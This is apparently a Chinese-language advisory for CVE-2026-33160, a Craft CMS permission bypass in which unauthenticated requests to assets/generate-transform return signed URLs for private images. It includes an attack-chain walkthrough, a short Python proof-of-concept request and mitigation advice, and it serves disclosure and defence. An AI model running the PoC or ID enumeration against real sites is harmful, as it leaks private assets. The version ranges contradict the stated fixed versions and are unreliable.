CVE-2026-33160 CVSS 5.3 中危

CVE-2026-33160 Craft CMS 权限绕过漏洞

披露日期: 2026-03-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33160

漏洞类型

权限绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Craft CMS

漏洞概述

Craft CMS 在特定版本中存在权限绕过漏洞。未经身份验证的攻击者可利用 `assets/generate-transform` 端点，通过传入私有资源的 assetId，获取有效的图片转换 URL。由于系统未在返回 URL 前验证权限，攻击者可利用此漏洞下载本应受保护的私有图片资源，导致信息泄露。该问题已在 Craft CMS 4.17.8 和 5.9.14 版本中修复。

技术细节

该漏洞的核心原因在于 Craft CMS 的 `assets/generate-transform` 接口存在访问控制缺陷。在受影响版本中，该端点设计为匿名访问，但系统在处理请求时，未严格验证请求者是否拥有访问指定 `assetId` 的权限。攻击者无需经过身份认证，仅需知道或猜测到私有资源的 ID，即可构造请求发送至该端点。系统会生成一个带有签名的、有效的图片转换 URL 并直接返回给攻击者。通过访问此 URL，攻击者可以下载服务器端生成的私有图像副本，成功绕过原有的权限检查机制，导致敏感非公开资产泄露。

攻击链分析

STEP 1

侦察

攻击者识别出目标网站使用的是受影响版本的 Craft CMS。

STEP 2

枚举与利用

攻击者向 `/assets/generate-transform` 端点发送 POST 请求，并在参数中包含猜测或已知的私有资产 ID。

STEP 3

获取链接

由于系统未校验权限，服务器返回一个有效的、已签名的图片转换 URL。

STEP 4

数据泄露

攻击者访问返回的 URL，下载本应受保护的私有图片数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable endpoint
target_url = "http://target-craft-cms.com/assets/generate-transform"

# The payload requires a private assetId.
# Attackers may enumerate IDs to find private assets.
payload = {
    "assetId": "123",  # Replace with a valid private asset ID
    "transform": "scale" # Example transformation type
}

try:
    # Send POST request to the vulnerable endpoint
    response = requests.post(target_url, data=payload)

    if response.status_code == 200:
        print("[+] Vulnerability confirmed!")
        print("[+] Response received:")
        print(response.text)
        # The response usually contains a URL to the transformed image
        # Accessing this URL allows downloading the private image.
    else:
        print("[-] Request failed or not vulnerable.")
        print("Status Code:", response.status_code)

except Exception as e:
    print("Error:", e)

影响范围

Craft CMS 4.0.0-RC1 至 4.17.8

Craft CMS 5.0.0-RC1 至 5.9.14

防御指南

临时缓解措施

如果无法立即升级，建议通过 Web 应用防火墙（WAF）或反向代理规则，拦截对 `/assets/generate-transform` 端点的匿名访问请求，或者限制该接口仅允许受信任的内部 IP 访问，以防止未经授权的资产遍历。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表